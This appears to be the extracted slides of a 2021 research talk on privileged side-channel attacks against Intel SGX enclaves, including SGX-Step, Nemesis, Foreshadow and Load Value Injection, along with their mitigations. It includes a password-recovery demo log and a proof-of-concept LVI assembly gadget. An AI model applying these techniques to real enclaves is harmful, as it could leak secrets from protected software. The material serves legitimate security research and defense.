### Microarchitectural Side-Channel Attacks for Privileged Software Adversaries

Jo Van Bulck

FWO/IBM Innovation Award Talk, Brussels, October 14, 2021

imec-DistriNet, KU Leuven · jo.vanbulck@cs.kuleuven.be · jovanbulck


https://informationisbeautiful.net/visualizations/million-lines-of-code/



#### Enclaved execution: Reducing attack surface

Traditional layered designs: large trusted computing base

Intel SGX promise: hardware-level isolation and attestation

#### Enclaved execution: Privileged side-channel attacks



**Game-changer:** Untrusted OS  $\rightarrow$  new class of powerful side channels!


1. Which novel privileged side channels exist? $\rightarrow$ We uncover previously unknown attack avenues
2. How well can they be exploited in practice? $\rightarrow$ We develop new techniques and practical attack frameworks
3. What can be leaked? $\rightarrow$ We leak metadata and data



## Idea 1: Privileged interrupts for side-channel amplification

Overall execution time reveals the correctness of individual password bytes!

#### Building the side-channel oracle with execution timing?

**Too noisy:** modern x86 processors are lightning fast...



#### Analogy: Studying galloping horse dynamics



https://en.wikipedia.org/wiki/Sallie_Gardner_at_a_Gallop

Eadweard Muybridge, "The Horse in Motion" (automatic electro-photograph, 1878): "Sallie Gardner", owned by Leland Stanford, running at a 1.40 gait over the Palo Alto track, 19th June, 1878.

#### SGX-Step: Executing enclaves one instruction at a time

https://github.com/jovanbulck/sgx-step

#### Demo: Building a deterministic password oracle with SGX-Step

```
[idt.c] DTR.base=0xfffffe000000000/size=4095 (256 entries)
[idt.c] established user space IDT mapping at 0x7f7ff8e9a000
[idt.c] installed asm IRQ handler at 10:0x56312d19b000
[idt.c] IDT[ 45] @0x7f7ff8e9a2d0 = 0x56312d19b000 (seg sel 0x10); p=1; dpl=3; type=14; ist=0
[file.c] reading buffer from '/dev/cpu/1/msr' (size=8)
[apic.c] established local memory mapping for APIC BASE=0xfee00000 at 0x7f7ff8e99000
[apic.c] APIC ID=2000000; LVTT=400ec; TDCR=0
[apic.c] APIC timer one-shot mode with division 2 (lvtt=2d/tdcr=0)
[main.c] recovering password length
[attacker] steps=15; guess='******'
[attacker] found pwd len = 6
[main.c] recovering password bytes
[attacker] steps=35; guess='SECRET' --> SUCCESS
[apic.c] Restored APIC LVTT=400ec/TDCR=0
[file.c] writing buffer to '/dev/cpu/1/msr' (size=8)
[main.c] all done; counted 2260/2183 IRQs (AEP/IDT)
jo@breuer:~/sgx-step-demo$
```

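As an added illustration of the comparison routine the demo single-steps (constructed example, not code from the talk or from SGX-Step): the leaky check returns at the first mismatching byte, so the number of loop iterations (standing in for the step count an interrupt-driven attacker observes) grows with every correct prefix byte, whereas the constant-time variant executes the same instruction trace for every guess. Function names and the `loop_iters` out-parameter are assumptions made for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed example: loop_iters stands in for the per-ecall instruction
 * count that single-stepping (e.g. with SGX-Step) makes exactly observable. */

/* Leaky check: returns at the first mismatching byte, so the executed
 * instruction count grows with every correct prefix byte of the guess. */
int pwd_check_leaky(const char *secret, const char *guess, size_t len,
                    size_t *loop_iters)
{
    *loop_iters = 0;
    for (size_t i = 0; i < len; i++) {
        (*loop_iters)++;
        if (secret[i] != guess[i])
            return 0;           /* early exit leaks the mismatch position */
    }
    return 1;
}

/* Hardened check: always walks the full fixed length and folds all byte
 * differences into one accumulator, so the instruction trace (and hence the
 * step count) is identical for every guess. volatile stops the compiler from
 * short-circuiting the loop once a difference has been seen. */
int pwd_check_ct(const char *secret, const char *guess, size_t len,
                 size_t *loop_iters)
{
    volatile uint8_t diff = 0;
    *loop_iters = 0;
    for (size_t i = 0; i < len; i++) {
        (*loop_iters)++;
        diff |= (uint8_t)(secret[i] ^ guess[i]);
    }
    return diff == 0;
}

int main(void)
{
    const char *secret = "SECRET";   /* constructed secret, as in the demo */
    const char *guesses[] = {"AXXXXX", "SXXXXX", "SECXXX", "SECRET"};
    for (int g = 0; g < 4; g++) {
        size_t leaky, ct;
        int ok_l = pwd_check_leaky(secret, guesses[g], 6, &leaky);
        int ok_c = pwd_check_ct(secret, guesses[g], 6, &ct);
        printf("guess=%s  leaky: iters=%zu ok=%d | ct: iters=%zu ok=%d\n",
               guesses[g], leaky, ok_l, ct, ok_c);
    }
    return 0;
}
```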


## Idea 2: Privileged interrupts for microarchitectural leakage

#### From architecture... to microarchitecture

#### Nemesis attack: Inferring key strokes from Sancus enclaves

Enclave x-ray: start-to-end trace of enclaved execution

Enclave x-ray: keymap bit traversal (ground truth)

[Figure: x-axis "Instruction (interrupt number)"]

#### Intel SGX microbenchmarks: Measuring x86 cache misses





## Idea 3: Privileged page tables for transient data leakage

#### Abusing out-of-order and speculative execution

#### Transient-execution attacks: Welcome to the world of fun!

#### Rumors: Meltdown immunity for SGX enclaves?

"Meltdown melted down everything, except for one thing": "[enclaves] remain protected and completely secure" — International Business Times, February 2018

"Anjuna's secure-runtime can protect critical applications against the Meltdown attack using enclaves": "[enclave memory accesses] redirected to an abort page, which has no value" — Anjuna Security, Inc., March 2018

"Spectre-like flaw undermines Intel processors' most secure element"

"Intel's SGX blown wide open by, you guessed it, a speculative execution attack. Speculative execution attacks truly are the gift that keeps on giving."

https://wired.com and https://arstechnica.com

#### Building Foreshadow: Evade SGX abort page semantics

SGX checks prohibit unauthorized access

#### Mitigating Foreshadow: Flush CPU microarchitecture

| Address (Hex) | Address (Dec) | Register name / bit | Description | Comment |
|------|-----|-----------------|----------------|----------------|
| 10BH | 267 | IA32_FLUSH_CMD | Flush Command (WO). Gives software a way to invalidate structures with finer granularity than other architectural methods. | If any one of the enumeration conditions for defined bit field positions holds. |
|      |     | 0               | L1D_FLUSH: Writeback and invalidate the L1 data cache. | If CPUID.(EAX=07H, ECX=0):EDX[28]=1 |
|      |     | 63:1            | Reserved | |

#### Idea: Inverting Foreshadow & co. with Load Value Injection (LVI)

```
# ~/sgx-step-fresh/app/lvi/Enclave/asm.S
# %rdi: store_pt
# %rsi: oracle_pt
.global ecall_lvi_sb_rop
ecall_lvi_sb_rop:
    mov %rsp, rsp_backup(%rip)
    lea page_b(%rip), %rsp
    add $OFFSET, %rsp

    /* transient delay */
    clflush dummy(%rip)
    mov dummy(%rip), %rax

    /* STORE TO USER ADRS */
    movq $'R', (%rdi)
    lea ret_gadget(%rip), %rax
    movq %rax, 8(%rdi)

    /* HIJACK TRUSTED LOAD FROM ENCLAVE STACK */
    /* should go to do_real_ret; will transiently go to ret_gadget if we fault */
    pop %rax
#if LFENCE
    /* mitigation: serialize the stack load before the ret consumes it */
    notq (%rsp)
    notq (%rsp)
    lfence
    ret
#else
    ret
#endif

1: jmp 1b
    mfence

do_real_ret:
    mov rsp_backup(%rip), %rsp
    ret
```

#### Mitigating LVI: Fencing vulnerable load instructions

#### Mitigating LVI: Compiler and assembler support

- GNU assembler: `-mlfence-after-load`
- LLVM: `-mlvi-hardening`
- MSVC: `-Qspectre-load`

"**GNU Assembler** Adds New Options For Mitigating Load Value Injection Attack" (Michael Larabel, 11 March 2020)

"LLVM Lands **Performance-Hitting Mitigation** For Intel LVI Vulnerability" (Michael Larabel, 3 April 2020)

"More Spectre Mitigations in MSVC" (March 13th, 2020)

#### Intel architectural enclaves: lfence counts

libsgx_qe.signed.so

- October 2019 ("surgical precision"): **23 fences**
- March 2020 ("big hammer")

- ⇒ **Trusted execution** environments (Intel SGX) ≠ perfect(!)
- ⇒ Importance of fundamental **side-channel research**; no silver-bullet defenses
- ⇒ Security **cross-cuts** the system stack: hardware, OS, compiler, application



